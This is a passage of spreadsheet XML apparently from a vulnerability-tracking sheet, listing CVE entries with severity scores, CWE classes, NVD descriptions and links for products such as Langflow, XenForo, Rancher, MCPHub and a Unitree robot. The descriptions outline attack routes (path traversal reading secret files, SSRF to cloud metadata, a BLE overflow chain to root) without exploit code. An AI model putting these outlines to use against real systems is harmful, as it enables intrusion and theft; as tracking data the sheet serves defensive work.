      <c r="J1032" s="5" t="inlineStr"/>
      <c r="K1032" s="5" t="inlineStr"/>
      <c r="L1032" s="5" t="inlineStr"/>
      <c r="M1032" s="5" t="inlineStr"/>
      <c r="N1032" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1032" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1032" s="5" t="inlineStr"/>
      <c r="Q1032" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R1032" s="5" t="inlineStr">
        <is>
          <t>A
stack-based buffer overflow vulnerability exists in the EasyMesh module of
TP-Link Archer AX55 v4. When Mesh mode is enabled, a LAN attacker may submit
crafted input that causes the easymesh daemon to crash and may potentially
achieve remote code execution on the device.
Successful
exploitation may cause the EasyMesh daemon to crash and may potentially allow
remote code execution when Mesh mode is enabled. This
may result in high impact to the confidentiality, integrity, and availability
of the affected device.</t>
        </is>
      </c>
      <c r="S1032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18167</t>
        </is>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1033" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19304</t>
        </is>
      </c>
      <c r="D1033" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1033" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1033" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1033" s="5" t="inlineStr"/>
      <c r="H1033" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1033" s="5" t="inlineStr"/>
      <c r="J1033" s="5" t="inlineStr"/>
      <c r="K1033" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L1033" s="5" t="inlineStr"/>
      <c r="M1033" s="5" t="inlineStr"/>
      <c r="N1033" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1033" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1033" s="5" t="inlineStr"/>
      <c r="Q1033" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1033" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to obtain sensitive information from internal services due to a URL parser discrepancy.</t>
        </is>
      </c>
      <c r="S1033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19304</t>
        </is>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1034" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19306</t>
        </is>
      </c>
      <c r="D1034" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1034" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1034" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1034" s="5" t="inlineStr"/>
      <c r="H1034" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1034" s="5" t="inlineStr"/>
      <c r="J1034" s="5" t="inlineStr"/>
      <c r="K1034" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L1034" s="5" t="inlineStr"/>
      <c r="M1034" s="5" t="inlineStr"/>
      <c r="N1034" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1034" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1034" s="5" t="inlineStr"/>
      <c r="Q1034" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1034" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 allows an authenticated attacker to read arbitrary files from the server filesystem — including server secret material (secret_key, JWT signing keys, the application database, /proc/self/environ, and other tenants' upload directories) — by supplying absolute paths or traversal sequences in the files parameter of an authenticated build request. The file contents were embedded as text attachments in the language model prompt and transmitted to the configured model endpoint, resulting in confidential data exfiltration. This bypassed the LANGFLOW_RESTRICT_LOCAL_FILE_ACCESS=true containment boundary, which was enforced for other file-reading components but not for the Chat Input to Message attachment pipeline.</t>
        </is>
      </c>
      <c r="S1034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19306</t>
        </is>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1035" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19397</t>
        </is>
      </c>
      <c r="D1035" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1035" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1035" s="5" t="inlineStr">
        <is>
          <t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t>
        </is>
      </c>
      <c r="G1035" s="5" t="inlineStr"/>
      <c r="H1035" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1035" s="5" t="inlineStr"/>
      <c r="J1035" s="5" t="inlineStr"/>
      <c r="K1035" s="5" t="inlineStr"/>
      <c r="L1035" s="5" t="inlineStr"/>
      <c r="M1035" s="5" t="inlineStr"/>
      <c r="N1035" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1035" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1035" s="5" t="inlineStr"/>
      <c r="Q1035" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R1035" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for a critical function in ASUS Control Center Express Agent allows an unauthenticated nearby user to control the host via a direct connection to the agent when the host has an active login session.
Refer to the ' 
Security Update for ASUS Control Center Express Agent ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="S1035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19397</t>
        </is>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1036" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53553</t>
        </is>
      </c>
      <c r="D1036" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1036" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1036" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1036" s="5" t="inlineStr"/>
      <c r="H1036" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1036" s="5" t="inlineStr"/>
      <c r="J1036" s="5" t="inlineStr"/>
      <c r="K1036" s="5" t="inlineStr"/>
      <c r="L1036" s="5" t="inlineStr"/>
      <c r="M1036" s="5" t="inlineStr"/>
      <c r="N1036" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1036" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P1036" s="5" t="inlineStr"/>
      <c r="Q1036" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-22</t>
        </is>
      </c>
      <c r="R1036" s="5" t="inlineStr">
        <is>
          <t>Goploy is an open-source automation deployment system. Prior to version 1.18.0, a severe path traversal vulnerability exists in its backend API endpoints, specifically /deploy/fileDiff (File Compare), when handling file paths provided by the client. This issue has been patched in version 1.18.0.</t>
        </is>
      </c>
      <c r="S1036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53553</t>
        </is>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1037" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63464</t>
        </is>
      </c>
      <c r="D1037" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1037" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1037" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1037" s="5" t="inlineStr"/>
      <c r="H1037" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1037" s="5" t="inlineStr"/>
      <c r="J1037" s="5" t="inlineStr"/>
      <c r="K1037" s="5" t="inlineStr"/>
      <c r="L1037" s="5" t="inlineStr"/>
      <c r="M1037" s="5" t="inlineStr"/>
      <c r="N1037" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1037" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1037" s="5" t="inlineStr"/>
      <c r="Q1037" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-918</t>
        </is>
      </c>
      <c r="R1037" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. From version 0.6.0 to before version 0.7.2, non-admin operators (role user) can set allow_private: true on their own managed webhook subscription (POST/PATCH /api/v1/webhook-subscriptions). No admin check exists on this field. At delivery time, allow_private switches the dispatcher to an unguarded HTTP client, bypassing the private/loopback/link-local SSRF guard — letting a low-privilege operator make the server request internal addresses. This issue has been patched in version 0.7.2.</t>
        </is>
      </c>
      <c r="S1037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63464</t>
        </is>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1038" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66767</t>
        </is>
      </c>
      <c r="D1038" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1038" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1038" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G1038" s="5" t="inlineStr"/>
      <c r="H1038" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1038" s="5" t="inlineStr"/>
      <c r="J1038" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K1038" s="5" t="inlineStr"/>
      <c r="L1038" s="5" t="inlineStr"/>
      <c r="M1038" s="5" t="inlineStr"/>
      <c r="N1038" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1038" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1038" s="5" t="inlineStr"/>
      <c r="Q1038" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R1038"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S1038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66767</t>
        </is>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1039" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69683</t>
        </is>
      </c>
      <c r="D1039" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1039" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1039" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1039" s="5" t="inlineStr"/>
      <c r="H1039" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1039" s="5" t="inlineStr"/>
      <c r="J1039" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K1039" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L1039" s="5" t="inlineStr"/>
      <c r="M1039" s="5" t="inlineStr"/>
      <c r="N1039" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1039" s="5" t="inlineStr"/>
      <c r="Q1039" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1039" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69683</t>
        </is>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1040" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73267</t>
        </is>
      </c>
      <c r="D1040" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1040" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1040" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1040" s="5" t="inlineStr"/>
      <c r="H1040" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1040" s="5" t="inlineStr"/>
      <c r="J1040" s="5" t="inlineStr"/>
      <c r="K1040" s="5" t="inlineStr"/>
      <c r="L1040" s="5" t="inlineStr"/>
      <c r="M1040" s="5" t="inlineStr"/>
      <c r="N1040" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1040" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P1040" s="5" t="inlineStr"/>
      <c r="Q1040" s="5" t="inlineStr">
        <is>
          <t>CWE-602</t>
        </is>
      </c>
      <c r="R1040" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the clusterclaims-controller component of multicluster engine (MCE). A tenant with standard permissions to create and delete ClusterClaim resources can exploit this by manipulating the `spec.namespace` field. This allows the tenant to specify and delete any ManagedCluster, including the hub's local-cluster or other tenants' clusters, due to a missing ownership check. This vulnerability can lead to a denial of service by enabling unauthorized deletion of ManagedClusters.</t>
        </is>
      </c>
      <c r="S1040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73267</t>
        </is>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1041" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73315</t>
        </is>
      </c>
      <c r="D1041" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1041" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1041" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1041" s="5" t="inlineStr"/>
      <c r="H1041" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1041" s="5" t="inlineStr"/>
      <c r="J1041" s="5" t="inlineStr"/>
      <c r="K1041" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L1041" s="5" t="inlineStr"/>
      <c r="M1041" s="5" t="inlineStr"/>
      <c r="N1041" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1041" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1041" s="5" t="inlineStr"/>
      <c r="Q1041" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1041" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a server-side request forgery vulnerability in the PayPal REST webhook handler that allows unauthenticated attackers to cause the server to make outbound HTTP requests to arbitrary destinations by supplying a crafted certificate URL in webhook headers without scheme, hostname, or allowlist validation. Attackers can submit a crafted POST to the PayPal webhook callback endpoint to reach internal network resources including cloud instance metadata services, potentially disclosing IAM credentials or enabling secondary internal service exploitation.</t>
        </is>
      </c>
      <c r="S1041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73315</t>
        </is>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1042" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75033</t>
        </is>
      </c>
      <c r="D1042" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1042" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1042" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G1042" s="5" t="inlineStr"/>
      <c r="H1042" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1042" s="5" t="inlineStr"/>
      <c r="J1042" s="5" t="inlineStr"/>
      <c r="K1042" s="5" t="inlineStr"/>
      <c r="L1042" s="5" t="inlineStr"/>
      <c r="M1042" s="5" t="inlineStr"/>
      <c r="N1042" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1042" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1042" s="5" t="inlineStr"/>
      <c r="Q1042" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1042" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Rancher Manager. Project Secrets were propagated into a namespace based only on its `field.cattle.io/projectId` annotation, without verifying that the referenced project belonged to the same downstream cluster. A user able to create namespaces on one cluster could set the annotation to a project ID from another cluster and have that project's secrets copied into a namespace under their control.
This issue affects Rancher: before 2.15.1.</t>
        </is>
      </c>
      <c r="S1042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75033</t>
        </is>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1043" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75569</t>
        </is>
      </c>
      <c r="D1043" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1043" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1043" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1043" s="5" t="inlineStr"/>
      <c r="H1043" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1043" s="5" t="inlineStr"/>
      <c r="J1043" s="5" t="inlineStr"/>
      <c r="K1043" s="5" t="inlineStr"/>
      <c r="L1043" s="5" t="inlineStr"/>
      <c r="M1043" s="5" t="inlineStr"/>
      <c r="N1043" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1043" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P1043" s="5" t="inlineStr"/>
      <c r="Q1043" s="5" t="inlineStr">
        <is>
          <t>CWE-1357</t>
        </is>
      </c>
      <c r="R1043" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in mce-operator-bundle. The build process fetches and executes scripts from a remote repository without performing integrity checks, such as commit pinning or signature verification. This allows a malicious actor with write access to the remote repository to inject and execute arbitrary code during the build. The consequence is a compromised build process, potentially leading to the distribution of malicious software.</t>
        </is>
      </c>
      <c r="S1043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75569</t>
        </is>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1044" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76640</t>
        </is>
      </c>
      <c r="D1044" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1044" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1044" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1044" s="5" t="inlineStr"/>
      <c r="H1044" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1044" s="5" t="inlineStr"/>
      <c r="J1044" s="5" t="inlineStr"/>
      <c r="K1044" s="5" t="inlineStr"/>
      <c r="L1044" s="5" t="inlineStr"/>
      <c r="M1044" s="5" t="inlineStr"/>
      <c r="N1044" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1044" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P1044" s="5" t="inlineStr"/>
      <c r="Q1044" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-787</t>
        </is>
      </c>
      <c r="R1044" s="5" t="inlineStr">
        <is>
          <t>Unitree G1 EDU firmware through 1.5.2 contains multiple chained vulnerabilities in the BLE GATT server and WiFi provisioning stack that allow unauthenticated proximate attackers to achieve root code execution without pairing or credentials by exploiting an unquoted heredoc variable in the WiFi provisioning script and a buffer overflow in the SSID chunk accumulator. Attackers can send crafted BLE writes to overflow a fixed BSS buffer across BLE connections, corrupting an adjacent mainloop function pointer dispatch entry that is subsequently invoked by the cleanup path passing attacker-controlled data to system() as uid 0.</t>
        </is>
      </c>
      <c r="S1044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76640</t>
        </is>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1045" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77909</t>
        </is>
      </c>
      <c r="D1045" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1045" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1045" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1045" s="5" t="inlineStr"/>
      <c r="H1045" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1045" s="5" t="inlineStr"/>
      <c r="J1045" s="5" t="inlineStr"/>
      <c r="K1045" s="5" t="inlineStr"/>
      <c r="L1045" s="5" t="inlineStr"/>
      <c r="M1045" s="5" t="inlineStr"/>
      <c r="N1045" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1045" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1045" s="5" t="inlineStr"/>
      <c r="Q1045" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R1045" s="5" t="inlineStr">
        <is>
          <t>Insufficiently protected credentials in Azure CycleCloud allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77909</t>
        </is>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1046" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78623</t>
        </is>
      </c>
      <c r="D1046" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1046" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1046" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G1046" s="5" t="inlineStr"/>
      <c r="H1046" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1046" s="5" t="inlineStr"/>
      <c r="J1046" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K1046" s="5" t="inlineStr"/>
      <c r="L1046" s="5" t="inlineStr"/>
      <c r="M1046" s="5" t="inlineStr"/>
      <c r="N1046" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1046" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1046" s="5" t="inlineStr"/>
      <c r="Q1046" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R1046"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S1046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78623</t>
        </is>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1047" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79750</t>
        </is>
      </c>
      <c r="D1047" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1047" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1047" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1047" s="5" t="inlineStr"/>
      <c r="H1047" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1047" s="5" t="inlineStr"/>
      <c r="J1047" s="5" t="inlineStr"/>
      <c r="K1047" s="5" t="inlineStr"/>
      <c r="L1047" s="5" t="inlineStr"/>
      <c r="M1047" s="5" t="inlineStr"/>
      <c r="N1047" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1047" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P1047" s="5" t="inlineStr"/>
      <c r="Q1047" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1047" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.30, MCPHub scopes non-admin users to servers they own (list views and config edits enforce ownership), but the tool-execution API does not. Any authenticated non-admin user can invoke tools on MCP servers owned by other users — servers they cannot even see in GET /api/servers. Because connected MCP servers carry real capability (filesystem, HTTP fetch, cloud APIs with the owner's keys), this is cross-tenant compromise: demonstrated arbitrary host file read (/etc/passwd, another user's secrets) and SSRF. This issue has been patched in version 1.0.30.</t>
        </is>
      </c>
      <c r="S1047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79750</t>
        </is>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1048" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81832</t>
        </is>
      </c>
      <c r="D1048" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1048" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1048" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1048" s="5" t="inlineStr"/>
      <c r="H1048" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1048" s="5" t="inlineStr"/>
      <c r="J1048" s="5" t="inlineStr"/>
      <c r="K1048" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="L1048" s="5" t="inlineStr"/>
      <c r="M1048" s="5" t="inlineStr"/>
      <c r="N1048" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1048" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1048" s="5" t="inlineStr"/>
      <c r="Q1048" s="5" t="inlineStr">
